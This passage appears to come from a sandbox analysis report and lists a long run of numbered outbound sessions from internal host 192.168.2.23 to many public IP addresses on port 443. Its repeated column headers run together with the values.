                                                21028192.168.2.2352934133.19.94.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21029192.168.2.234046051.227.112.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21030192.168.2.2337984175.192.95.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21031192.168.2.234465273.37.227.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21032192.168.2.2341200115.5.176.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21033192.168.2.2343954223.66.3.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21034192.168.2.2339538143.42.135.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21035192.168.2.2352870202.197.49.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21036192.168.2.2353866173.6.230.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21037192.168.2.2333468152.57.202.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21038192.168.2.2332888135.153.11.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21039192.168.2.233874291.8.125.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21040192.168.2.235967840.89.253.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21041192.168.2.2357120181.68.103.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21042192.168.2.2333186105.44.77.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21043192.168.2.234019065.16.16.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21044192.168.2.234702639.89.88.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21045192.168.2.234528851.96.179.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21046192.168.2.2349550183.10.206.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21047192.168.2.2337814164.158.51.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21048192.168.2.2344712123.229.138.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21049192.168.2.234288060.12.37.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21050192.168.2.2358156119.78.224.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21051192.168.2.2357920194.72.159.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21052192.168.2.233840434.21.115.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21053192.168.2.234367824.165.30.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21054192.168.2.23490901.72.93.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21055192.168.2.2353902151.210.138.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21056192.168.2.2358440150.74.174.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21057192.168.2.2358036196.127.254.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21058192.168.2.2344150202.101.253.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21059192.168.2.234956294.177.110.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21060192.168.2.2336986144.82.61.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21061192.168.2.2341820149.73.79.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21062192.168.2.2351170126.100.104.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21063192.168.2.235014464.4.19.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21064192.168.2.2337666219.37.39.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21065192.168.2.2353244196.197.126.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21066192.168.2.235293417.155.109.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21067192.168.2.2339466154.70.194.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21068192.168.2.233544644.84.60.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21069192.168.2.235895865.235.163.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21070192.168.2.235135014.153.17.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21071192.168.2.234773893.177.31.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21072192.168.2.234315694.105.208.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21073192.168.2.2360942175.38.147.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21074192.168.2.2334340216.238.195.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21075192.168.2.233381853.1.114.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21076192.168.2.2358088149.52.80.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21077192.168.2.23402164.200.241.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21078192.168.2.233918051.189.137.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21079192.168.2.2346260132.194.99.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21080192.168.2.235189667.149.0.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21081192.168.2.2345670124.49.182.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21082192.168.2.2345478192.34.7.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21083192.168.2.234838614.224.175.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21084192.168.2.2343516204.184.98.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21085192.168.2.234683685.167.60.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21086192.168.2.23466381.212.119.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21087192.168.2.2355682212.152.154.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21088192.168.2.2334270176.106.107.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21089192.168.2.234809446.70.46.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21090192.168.2.235722823.12.170.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21091192.168.2.235728420.95.7.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21092192.168.2.2358386131.156.152.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21093192.168.2.233409279.220.255.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21094192.168.2.2336566141.180.141.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21095192.168.2.235935845.214.197.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21096192.168.2.2352734105.198.86.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21097192.168.2.233890818.254.249.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21098192.168.2.235564853.184.202.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21099192.168.2.233301490.142.107.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21100192.168.2.234681650.6.67.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21101192.168.2.2353986183.63.0.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21102192.168.2.234840658.125.3.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21103192.168.2.2338870101.41.209.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21104192.168.2.235013820.250.123.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21105192.168.2.2345926199.72.80.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21106192.168.2.233347290.93.251.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21107192.168.2.2355836158.86.33.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21108192.168.2.2340800117.188.195.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21109192.168.2.2356830222.70.125.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21110192.168.2.2356702158.58.155.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21111192.168.2.23490928.168.1.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21112192.168.2.234144883.52.93.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21113192.168.2.2345612142.107.244.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21114192.168.2.2344092201.80.50.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21115192.168.2.2353248173.201.153.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21116192.168.2.234458876.93.143.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21117192.168.2.2335362114.118.19.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21118192.168.2.2360316194.77.35.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21119192.168.2.2333714161.76.68.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21120192.168.2.2335068131.13.253.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21121192.168.2.2333406145.128.27.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21122192.168.2.235447485.137.78.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21123192.168.2.2353262179.27.236.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21124192.168.2.2351306207.138.162.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21125192.168.2.2346194205.111.192.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21126192.168.2.235181664.20.155.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21127192.168.2.235078894.93.15.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21128192.168.2.2359604100.254.141.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21129192.168.2.235448448.125.250.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21130192.168.2.2356588181.20.23.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21131192.168.2.235259489.180.115.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21132192.168.2.235438085.116.94.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21133192.168.2.233589225.37.168.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21134192.168.2.2344676166.238.199.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21135192.168.2.234995885.114.240.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21136192.168.2.2340428136.27.65.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21137192.168.2.233336625.150.16.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21138192.168.2.234456892.167.147.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21139192.168.2.2341478185.107.171.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21140192.168.2.23508882.25.32.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21141192.168.2.2356274146.213.35.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21142192.168.2.2340692184.84.210.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21143192.168.2.2351924189.206.135.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21144192.168.2.2335538185.11.228.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21145192.168.2.234067035.4.112.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21146192.168.2.2340244151.146.217.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21147192.168.2.2350918130.19.45.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21148192.168.2.2356396201.75.236.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21149192.168.2.2344750115.42.154.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21150192.168.2.2356890204.178.250.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21151192.168.2.235131831.139.42.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21152192.168.2.234227273.8.155.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21153192.168.2.234518223.105.191.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21154192.168.2.2333420194.73.79.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21155192.168.2.2352212167.55.243.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21156192.168.2.235623031.90.92.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21157192.168.2.2354016199.185.51.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21158192.168.2.2357240128.154.231.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21159192.168.2.234909652.18.216.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21160192.168.2.2342280160.3.92.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21161192.168.2.2347378119.235.182.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21162192.168.2.2348030153.10.113.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21163192.168.2.235898625.220.166.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21164192.168.2.23527825.82.61.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21165192.168.2.2340394114.174.3.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21166192.168.2.235053818.187.23.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21167192.168.2.233378284.76.205.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21168192.168.2.235172664.87.88.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21169192.168.2.2338484145.179.28.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21170192.168.2.2344194110.142.239.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21171192.168.2.2333882223.242.89.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21172192.168.2.2341814119.57.76.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21173192.168.2.2348706162.196.145.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21174192.168.2.2338296125.52.207.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21175192.168.2.2352196153.254.216.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21176192.168.2.2348022163.3.59.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21177192.168.2.2356958197.83.138.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21178192.168.2.2351726221.245.167.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21179192.168.2.235787065.243.230.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21180192.168.2.2360940164.174.235.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21181192.168.2.2350224178.215.114.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21182192.168.2.2337026129.155.41.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21183192.168.2.233300488.228.195.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21184192.168.2.235671081.162.227.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21185192.168.2.2334204170.118.220.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21186192.168.2.2355160190.242.175.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21187192.168.2.235828834.236.108.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21188192.168.2.2354848223.249.56.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21189192.168.2.2345528172.221.72.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21190192.168.2.2353240132.152.78.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21191192.168.2.2343242203.100.185.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192192.168.2.2350686159.244.160.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21193192.168.2.2347792181.11.248.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21194192.168.2.235087277.211.89.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21195192.168.2.2341988174.23.144.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21196192.168.2.234247240.108.164.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21197192.168.2.2348128191.60.222.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21198192.168.2.235177023.246.252.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21199192.168.2.23474189.136.194.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21200192.168.2.2352714159.5.49.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21201192.168.2.2348238162.140.212.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21202192.168.2.2351102218.87.172.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21203192.168.2.2343958182.52.108.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21204192.168.2.235450868.106.52.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21205192.168.2.2359112145.224.246.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21206192.168.2.233751487.142.214.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21207192.168.2.2354038141.214.216.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21208192.168.2.233702292.193.67.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21209192.168.2.23562641.57.45.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21210192.168.2.2354596183.64.32.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21211192.168.2.2340190168.112.70.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21212192.168.2.2352260167.239.104.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21213192.168.2.233600268.103.30.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21214192.168.2.233862453.120.224.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21215192.168.2.234497292.67.27.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21216192.168.2.234231643.155.242.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21217192.168.2.235187852.233.226.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21218192.168.2.2341028122.63.186.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21219192.168.2.233507098.103.208.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21220192.168.2.234039641.51.186.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21221192.168.2.2353048158.244.103.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21222192.168.2.2335776190.67.188.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21223192.168.2.2342342161.104.201.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21224192.168.2.2341424144.169.144.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21225192.168.2.233818496.190.223.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21226192.168.2.233410685.3.143.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21227192.168.2.2360650111.45.49.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21228192.168.2.235045088.204.58.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21229192.168.2.2359270195.205.200.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21230192.168.2.2336532209.141.96.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21231192.168.2.234980871.109.254.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21232192.168.2.2333896133.127.194.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21233192.168.2.2335444206.156.240.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21234192.168.2.2343144122.49.71.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21235192.168.2.235483218.57.166.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21236192.168.2.235597850.132.161.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21237192.168.2.2351448130.208.255.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21238192.168.2.234661444.137.159.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21239192.168.2.234822454.56.190.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21240192.168.2.234596850.0.121.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21241192.168.2.2359622122.237.115.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21242192.168.2.2333798159.198.56.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21243192.168.2.2355470219.44.53.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21244192.168.2.2353542223.158.20.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21245192.168.2.2360914151.107.11.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21246192.168.2.234939881.2.207.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21247192.168.2.2344172138.144.255.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21248192.168.2.2341538192.254.238.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21249192.168.2.233302683.241.113.11443
                                                TimestampBytes transferredDirectionData


